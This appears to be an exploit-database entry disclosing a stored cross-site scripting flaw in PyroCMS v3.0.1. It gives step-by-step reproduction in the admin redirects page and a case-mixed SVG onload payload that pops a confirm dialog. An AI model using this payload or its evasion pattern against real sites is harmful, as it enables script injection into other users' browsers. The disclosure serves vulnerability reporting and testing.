Share
## https://sploitus.com/exploit?id=PACKETSTORM:175896
# Exploit Title: PyroCMS v3.0.1 - Stored XSS  
# Date: 2023-11-25  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://pyrocms.com/  
# Version: v3.0.1  
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS  
  
  
  
----------------------------------------------------------------------------------------------------  
  
  
1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1  
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//  
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects  
4-You will be see alert button